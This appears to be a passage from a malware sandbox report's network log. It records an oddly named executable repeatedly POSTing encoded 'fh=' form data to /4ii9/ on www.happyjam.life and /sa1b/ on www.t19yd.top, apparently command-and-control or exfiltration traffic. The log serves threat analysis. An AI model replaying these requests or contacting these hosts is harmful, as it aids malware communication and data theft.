                                                                                Dec 3, 2024 14:22:29.471049070 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                Dec 3, 2024 14:22:29.471062899 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                Dec 3, 2024 14:22:29.471256971 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                Dec 3, 2024 14:22:29.471302986 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                Dec 3, 2024 14:22:29.471321106 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                                Dec 3, 2024 14:22:29.471334934 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                                Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                                Dec 3, 2024 14:22:29.471616983 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                                Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                                Dec 3, 2024 14:22:29.471630096 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                                Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.549943209.74.77.107801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:35.430665970 CET780OUTPOST /4ii9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Origin: http://www.happyjam.life
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.happyjam.life/4ii9/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 6f 41 6c 67 71 4c 6e 78 35 74 65 4b 58 62 4e 49 65 53 4a 71 6a 35 6c 46 7a 57 50 35 4e 53 65 56 65 76 45 59 4d 67 43 58 4c 6a 33 34 51 42 37 37 42 2f 58 7a 46 79 62 51 49 30 43 2b 62 48 57 39 67 65 78 47 74 66 4e 30 67 6e 51 48 77 68 48 6a 57 75 78 73 6f 38 63 65 53 6c 31 47 46 39 41 42 4c 52 7a 31 2b 64 7a 55 73 47 38 45 32 57 64 44 44 56 46 43 30 34 68 45 49 62 58 46 42 55 4f 41 34 48 4e 74 39 4c 38 61 5a 35 7a 72 6e 68 46 4c 64 49 62 4b 74 55 71 37 61 63 2b 75 55 64 68 72 47 43 35 58 43 47 61 36 32 48 51 32 32 55 56 31 39 59 69 78 4b 57 73 4a 77 76 63 3d
                                                                                Data Ascii: fh=OAifYW+lPdFdoAlgqLnx5teKXbNIeSJqj5lFzWP5NSeVevEYMgCXLj34QB77B/XzFybQI0C+bHW9gexGtfN0gnQHwhHjWuxso8ceSl1GF9ABLRz1+dzUsG8E2WdDDVFC04hEIbXFBUOA4HNt9L8aZ5zrnhFLdIbKtUq7ac+uUdhrGC5XCGa62HQ22UV19YixKWsJwvc=
                                                                                Dec 3, 2024 14:22:36.727591038 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:36 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.549949209.74.77.107801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:38.088601112 CET800OUTPOST /4ii9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Origin: http://www.happyjam.life
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.happyjam.life/4ii9/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 71 68 56 67 6f 73 4c 78 6f 64 65 4a 62 37 4e 49 58 79 49 74 6a 35 70 46 7a 58 4b 68 4d 67 4b 56 66 4e 63 59 65 55 75 58 65 6a 33 34 59 68 37 2b 63 76 57 65 46 79 58 59 49 32 47 2b 62 48 53 39 67 63 70 47 71 6f 5a 33 6a 58 51 46 2f 42 48 68 5a 4f 78 73 6f 38 63 65 53 6c 68 73 46 39 59 42 4c 68 6a 31 2b 2f 4c 58 76 47 38 4c 2f 32 64 44 55 46 46 65 30 34 68 69 49 61 61 53 42 58 32 41 34 43 78 74 38 61 38 5a 58 4a 79 67 70 42 46 41 57 36 44 47 31 6c 65 6e 59 2b 6a 64 55 61 46 33 44 30 49 39 59 6b 53 53 6c 6e 38 4f 6d 48 64 43 73 6f 44 59 51 31 38 35 75 34 49 34 39 59 37 76 50 70 6b 4d 46 77 77 75 63 4b 30 50 6b 42 66 6b
                                                                                Data Ascii: fh=OAifYW+lPdFdqhVgosLxodeJb7NIXyItj5pFzXKhMgKVfNcYeUuXej34Yh7+cvWeFyXYI2G+bHS9gcpGqoZ3jXQF/BHhZOxso8ceSlhsF9YBLhj1+/LXvG8L/2dDUFFe04hiIaaSBX2A4Cxt8a8ZXJygpBFAW6DG1lenY+jdUaF3D0I9YkSSln8OmHdCsoDYQ185u4I49Y7vPpkMFwwucK0PkBfk
                                                                                Dec 3, 2024 14:22:39.404553890 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:39 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.549955209.74.77.107801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:40.753995895 CET1817OUTPOST /4ii9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Origin: http://www.happyjam.life
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.happyjam.life/4ii9/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 71 68 56 67 6f 73 4c 78 6f 64 65 4a 62 37 4e 49 58 79 49 74 6a 35 70 46 7a 58 4b 68 4d 67 79 56 66 2b 55 59 4d 46 75 58 59 54 33 34 53 42 37 2f 63 76 57 6d 46 78 6e 63 49 32 61 41 62 42 4f 39 79 70 31 47 76 5a 5a 33 30 6e 51 46 30 68 48 38 57 75 78 35 6f 38 73 61 53 6d 5a 73 46 39 59 42 4c 6a 72 31 70 39 7a 58 6a 6d 38 45 32 57 64 48 44 56 46 69 30 34 35 63 49 61 65 43 43 6d 57 41 34 69 42 74 2b 70 55 5a 56 70 79 69 6b 68 45 41 57 36 2b 59 31 6c 79 72 59 2f 48 33 55 63 31 33 43 69 56 41 4e 55 53 4c 33 48 74 32 6d 6b 70 45 35 64 75 68 50 30 45 79 68 71 52 43 35 5a 54 36 41 2f 67 67 44 43 35 56 4c 38 6f 4a 6c 42 6e 71 6b 4d 78 49 73 70 5a 65 71 57 68 51 41 34 57 79 41 47 43 37 50 4e 74 75 50 6a 54 75 45 46 68 39 57 4c 35 6f 35 65 62 66 50 7a 67 43 53 48 77 69 55 6e 63 6a 37 32 32 65 4d 4c 57 76 79 37 36 48 70 52 2b 49 48 68 71 63 47 4c 37 32 4b 76 46 77 48 50 59 4d 52 42 65 6d 63 75 76 73 57 33 73 6a 30 50 45 6e 64 43 53 6f 50 54 7a 62 44 6d 58 78 53 6d 78 [TRUNCATED]
                                                                                Data Ascii: fh=OAifYW+lPdFdqhVgosLxodeJb7NIXyItj5pFzXKhMgyVf+UYMFuXYT34SB7/cvWmFxncI2aAbBO9yp1GvZZ30nQF0hH8Wux5o8saSmZsF9YBLjr1p9zXjm8E2WdHDVFi045cIaeCCmWA4iBt+pUZVpyikhEAW6+Y1lyrY/H3Uc13CiVANUSL3Ht2mkpE5duhP0EyhqRC5ZT6A/ggDC5VL8oJlBnqkMxIspZeqWhQA4WyAGC7PNtuPjTuEFh9WL5o5ebfPzgCSHwiUncj722eMLWvy76HpR+IHhqcGL72KvFwHPYMRBemcuvsW3sj0PEndCSoPTzbDmXxSmxBNK6ieO7EMUui/0yygEuN5esYI7CqcoLTSyr9F1FK7jL48zItNc6V3LexpL7Vd1vE30hYADm281ebwj7dQiHGq68ARer/qW50UzOT+Vs2kebyo707rEhwZF0aiJeOs9V0A76of8Rg2bZMpHQRG76XTHbCi2VBKKI4CTqA6Vkv7p1wtBoWifo9/R+wUjy6eGV766YzN7BLbz4dZxjZu3AsEs5K6d2Ppyi45OSQrGyR043aZtgrf/cUz1ElzrI3yaYINtr4f4RZvQWigCcFdYCp83ukQ3WEw4HA2pZzIqccqIW36fcZlrghWGtZAmzJeaqYMvamUF2iC/xny2Yz0AZ+qQiNFne90u3v/oxIWvi5txTT7Q+JahGugCi64TagOxFtsjT72r7vYnfQmYUYz49g0pmB2Sk91wgvW++l5S2nT1SddUrYsfdPtv4XFcRDbyhZ6ziZwkLWhjiAZOo6d+XumnEFcp/7Uwdh+xuAmLQyLynFDjuN8Epl3OVWy9kSWsTedTV1ZI9SlY0e5mQZT878giZYDTMPUxfOD+Ubq3b8R5kougiPFWXdkyrGRr1dtIHQTCdPbaomjUg+Io6CWgV+/wvGaANs5dezB8u3QF/7US2tmCB4+DBLfFa4c1tEsDkykX2PHNUzrti/ipV6A4YXLNhC5IFJFq/hU [TRUNCATED]
                                                                                Dec 3, 2024 14:22:42.087258101 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:41 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.549961209.74.77.107801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:43.464313030 CET525OUTGET /4ii9/?fh=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74THGa4p/rcEpcgteY+NZBAve/cPV6mEezHweDFAvow==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.happyjam.life
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:44.685353041 CET548INHTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:44 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.54997838.47.207.164801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:50.343693018 CET768OUTPOST /sa1b/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.t19yd.top
                                                                                Origin: http://www.t19yd.top
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.t19yd.top/sa1b/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 61 61 76 70 57 66 2f 44 4d 74 6b 38 2b 69 6d 46 77 4b 70 48 6b 48 43 7a 52 71 37 53 4b 4f 4b 44 63 65 75 68 48 35 54 36 6f 6d 44 6d 35 35 67 6f 47 2b 59 37 56 56 38 33 51 57 42 62 35 6d 56 64 6d 79 2f 74 53 67 6f 62 58 78 43 6e 2b 73 35 62 46 50 5a 52 62 44 6f 6b 34 74 79 59 45 62 58 33 63 6e 55 51 5a 2f 4c 69 78 41 39 31 65 72 79 4b 6c 59 6b 73 62 76 49 41 38 74 5a 34 4f 4c 2b 6b 35 58 42 58 75 59 2b 62 4d 55 7a 59 35 65 4b 46 73 53 38 32 48 44 50 6f 6a 77 44 38 70 70 34 2f 6d 30 66 61 77 45 48 30 68 75 68 69 78 56 78 6c 64 35 4a 4b 2f 48 53 52 35 79 38 57 62 6e 37 42 58 47 43 47 78 6d 49 3d
                                                                                Data Ascii: fh=aavpWf/DMtk8+imFwKpHkHCzRq7SKOKDceuhH5T6omDm55goG+Y7VV83QWBb5mVdmy/tSgobXxCn+s5bFPZRbDok4tyYEbX3cnUQZ/LixA91eryKlYksbvIA8tZ4OL+k5XBXuY+bMUzY5eKFsS82HDPojwD8pp4/m0fawEH0huhixVxld5JK/HSR5y8Wbn7BXGCGxmI=
                                                                                Dec 3, 2024 14:22:51.858640909 CET302INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.54998538.47.207.164801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:53.051351070 CET788OUTPOST /sa1b/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.t19yd.top
                                                                                Origin: http://www.t19yd.top
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.t19yd.top/sa1b/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
